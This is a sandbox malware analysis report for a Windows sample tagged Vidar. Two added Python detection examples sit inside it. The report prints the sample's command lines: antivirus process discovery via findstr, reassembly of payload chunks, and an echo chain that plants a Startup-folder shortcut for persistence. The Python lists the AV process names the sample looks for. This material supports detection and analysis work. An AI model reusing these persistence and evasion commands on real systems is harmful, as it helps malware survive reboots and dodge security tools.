Windows Analysis Report
ldqj18tn.exe

Overview

General Information

Sample name:ldqj18tn.exe
Analysis ID:1577511
MD5:574ab8397d011243cb52bef069bad2dc
SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
Tags: 18521511316185215113209, bulletproof, exe, Vidar, user-abus3reports

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ldqj18tn.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\ldqj18tn.exe" MD5: 574AB8397D011243CB52BEF069BAD2DC)
    • cmd.exe (PID: 7460 cmdline: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7576 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7564 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1244 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7852 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5612 cmdline: cmd /c md 704579 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7068 cmdline: findstr /V "MARTNMSPIDERRINGTONE" Mh MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1672 cmdline: cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Organizational.pif (PID: 3488 cmdline: Organizational.pif u MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5844 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7556 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7400 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnoMesh.scr (PID: 1704 cmdline: "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches
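The process tree above is a chain of individually weak signals: tasklist piped into findstr for AV process names, findstr /V used to strip a marker line out of a file, copy /b reassembling sixteen chunks into one file, a .pif started from Temp, a .url written into the Startup folder, and choice /t as a delay. The Python below is an added example, not part of the Joe Sandbox report, that applies one rule per signal to process-creation events reconstructed from the tree and then correlates the hits along the parent/child chain rooted at the sample. The image paths for tasklist.exe, choice.exe and the inner cmd.exe are an assumption (SysWOW64, like the findstr.exe and cmd.exe images in the Sigma matches); the rule names and thresholds are the example's own.

```python
import re
from collections import defaultdict

# Process-creation events constructed from the process tree in this report:
# PIDs, parent PIDs and command lines as shown there. Image paths for
# tasklist.exe, choice.exe and the inner cmd.exe are an assumption (SysWOW64,
# like the findstr.exe and cmd.exe images in the Sigma matches). Sample input
# for the example, not a live event feed.
def ev(pid, ppid, image, cmd):
    return {"pid": pid, "ppid": ppid, "image": image, "cmd": cmd}

SYS = r"C:\Windows\SysWOW64"
TM = r"C:\Users\user\AppData\Local\TechMesh Dynamics"
STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
EVENTS = [
    ev(8140, 0, r"C:\Users\user\Desktop\ldqj18tn.exe", r'"C:\Users\user\Desktop\ldqj18tn.exe"'),
    ev(7460, 8140, SYS + r"\cmd.exe",
       r'"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat'),
    ev(7576, 7460, SYS + r"\tasklist.exe", "tasklist"),
    ev(7564, 7460, SYS + r"\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ev(7852, 7460, SYS + r"\findstr.exe",
       'findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    ev(5612, 7460, SYS + r"\cmd.exe", "cmd /c md 704579"),
    ev(7068, 7460, SYS + r"\findstr.exe", 'findstr /V "MARTNMSPIDERRINGTONE" Mh'),
    ev(1672, 7460, SYS + r"\cmd.exe",
       r"cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International"
       r" + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica"
       r" + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u"),
    ev(3488, 7460, r"C:\Users\user\AppData\Local\Temp\704579\Organizational.pif",
       "Organizational.pif u"),
    ev(5844, 3488, SYS + r"\cmd.exe",
       'cmd /k echo [InternetShortcut] > "%s\\InnoMesh.url" & echo URL="%s\\InnoMesh.js"'
       ' >> "%s\\InnoMesh.url" & exit' % (STARTUP, TM, STARTUP)),
    ev(7556, 7460, SYS + r"\choice.exe", "choice /d y /t 5"),
    ev(7400, 0, r"C:\Windows\System32\wscript.exe",
       '"C:\\Windows\\System32\\WScript.exe" "%s\\InnoMesh.js"' % TM),
    ev(1704, 7400, TM + r"\InnoMesh.scr", '"%s\\InnoMesh.scr" "%s\\M"' % (TM, TM)),
]

# Process names the sample greps for (taken from the two findstr command lines).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "sophoshealth"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
SCRIPT_ARG = re.compile(r'\.(js|jse|vbs|vbe|wsf)"?(\s|$)', re.I)

def base(path):
    return path.rsplit("\\", 1)[-1].lower()

def words(cmd):
    return set(re.findall(r"[a-z0-9]+", cmd.lower()))

# One predicate per weak signal; each takes an event dict and returns a bool.
RULES = {
    "av_process_discovery": lambda e: base(e["image"]) == "findstr.exe"
        and bool(words(e["cmd"]) & AV_PROCESS_NAMES),
    "findstr_marker_strip": lambda e: base(e["image"]) == "findstr.exe"
        and re.search(r'\s/V\s+"[A-Z0-9]{6,}"\s', e["cmd"]) is not None,
    "chunk_reassembly": lambda e: re.search(r"\bcopy\s+/b\b", e["cmd"], re.I) is not None
        and e["cmd"].count(" + ") >= 4,
    "suspicious_ext_from_userdir": lambda e: base(e["image"]).endswith((".pif", ".scr", ".com"))
        and USER_WRITABLE.search(e["image"]) is not None,
    "startup_url_persistence": lambda e: "[internetshortcut]" in e["cmd"].lower()
        and "\\start menu\\programs\\startup\\" in e["cmd"].lower(),
    "wsh_script_from_appdata": lambda e: base(e["image"]) in {"wscript.exe", "cscript.exe"}
        and SCRIPT_ARG.search(e["cmd"]) is not None and USER_WRITABLE.search(e["cmd"]) is not None,
    "choice_timer_delay": lambda e: base(e["image"]) == "choice.exe"
        and re.search(r"/t\s+\d+", e["cmd"], re.I) is not None,
}

def evaluate(events):
    """Map pid -> list of rule names that fired on that process."""
    hits = defaultdict(list)
    for e in events:
        for name, check in RULES.items():
            if check(e):
                hits[e["pid"]].append(name)
    return dict(hits)

def tree_rules(events, hits, root_pid):
    """Distinct rules that fired anywhere in the subtree rooted at root_pid."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    seen, stack = set(), [root_pid]
    while stack:
        pid = stack.pop()
        seen.update(hits.get(pid, []))
        stack.extend(children[pid])
    return sorted(seen)

if __name__ == "__main__":
    hits = evaluate(EVENTS)
    for pid, names in sorted(hits.items()):
        print(pid, ", ".join(names))
    print("chain rooted at 8140:", tree_rules(EVENTS, hits, 8140))
```

Each rule on its own would be noisy in an enterprise (findstr and copy /b are everyday commands); the value is in tree_rules, which shows six different signals under one parent, which is what turns a batch file into an alert.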

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , ProcessId: 7400, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: Organizational.pif u, CommandLine: Organizational.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: Organizational.pif u, ProcessId: 3488, ProcessName: Organizational.pif
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ldqj18tn.exe", ParentImage: C:\Users\user\Desktop\ldqj18tn.exe, ParentProcessId: 8140, ParentProcessName: ldqj18tn.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ProcessId: 7460, ProcessName: cmd.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , ProcessId: 7400, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
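The .url file that cmd.exe writes into the Startup folder is plain INI text whose URL value is a local path to InnoMesh.js, which is why wscript.exe runs the script at logon. Below is an added example, not code from the report or from the sample, that parses such a file the way a triage script would, tolerating the trailing space and the quotes that the two echo commands leave behind, and flags local targets that are scripts or executables, that live in user-writable directories, or that are reached from the Startup folder. The file contents are constructed from the echo commands in the process tree; the extension list and the findings are the example's own.

```python
import re

# Constructed content: what the two echo commands in the process tree write.
# cmd's echo emits everything up to the redirect operator, so each line ends
# with a space and the path keeps the quotes it had on the command line.
INNOMESH_URL = "\r\n".join([
    r"[InternetShortcut] ",
    r'URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" ',
    "",
])
INNOMESH_URL_PATH = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
                     r"\Start Menu\Programs\Startup\InnoMesh.url")

# Extensions that should never be the target of a shortcut in Startup.
SCRIPT_OR_BINARY = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1",
                    ".bat", ".cmd", ".exe", ".scr", ".pif", ".com", ".lnk"}
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)

def parse_url_file(text):
    """Minimal INI parse; returns the key/value pairs of [InternetShortcut]."""
    section, keys = None, {}
    for raw in text.splitlines():
        line = raw.strip()                      # drops the trailing space echo left
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            k, v = line.split("=", 1)
            keys[k.strip().lower()] = v.strip().strip('"')   # drops the quotes
    return keys

def local_target(url):
    """Filesystem path if the URL points at a local or UNC file, else None."""
    if url.lower().startswith("file:///"):
        return url[8:].replace("/", "\\")
    if re.match(r"^[a-z]:\\", url, re.I) or url.startswith("\\\\"):
        return url
    return None

def assess(text, url_file_path):
    """Findings for one .url file given its text and where it was found."""
    keys = parse_url_file(text)
    url = keys.get("url", "")
    path = local_target(url)
    findings = []
    if path is None:                            # a web URL: nothing to flag here
        return {"url": url, "path": None, "findings": findings}
    name = path.rsplit("\\", 1)[-1]
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext in SCRIPT_OR_BINARY:
        findings.append("target is a script or executable (%s)" % ext)
    if USER_WRITABLE.match(path):
        findings.append("target lives in a user-writable directory")
    if "\\start menu\\programs\\startup\\" in url_file_path.lower():
        findings.append(".url sits in the Startup folder: runs at every logon")
    return {"url": url, "path": path, "findings": findings}

if __name__ == "__main__":
    result = assess(INNOMESH_URL, INNOMESH_URL_PATH)
    print(result["path"])
    for f in result["findings"]:
        print(" -", f)
```

The same function, pointed at every *.url under both the per-user and the all-users Startup folders, is a cheap persistence sweep: a shortcut whose target is a web address yields no findings, while one whose target is a local script in AppData yields all three.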

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7852, ProcessName: findstr.exe
No Suricata rule has matched

AV Detection

Source: ldqj18tn.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.2% probability
Source: ldqj18tn.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ldqj18tn.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exe; Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ldqj18tn.exe; Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\ldqj18tn.exe; Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002BCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_00254005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0025FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_00253CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\704579\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\704579
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002C29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; DNS traffic detected: DNS query: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
Source: ldqj18tn.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ldqj18tn.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ldqj18tn.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ldqj18tn.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: ldqj18tn.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ldqj18tn.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ldqj18tn.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ldqj18tn.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ldqj18tn.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ldqj18tn.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ldqj18tn.exe; String found in binary or memory: http://ocsp.digicert.com0
Source: ldqj18tn.exe; String found in binary or memory: http://ocsp.digicert.com0A
Source: ldqj18tn.exe; String found in binary or memory: http://ocsp.digicert.com0C
Source: ldqj18tn.exe; String found in binary or memory: http://ocsp.digicert.com0X
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
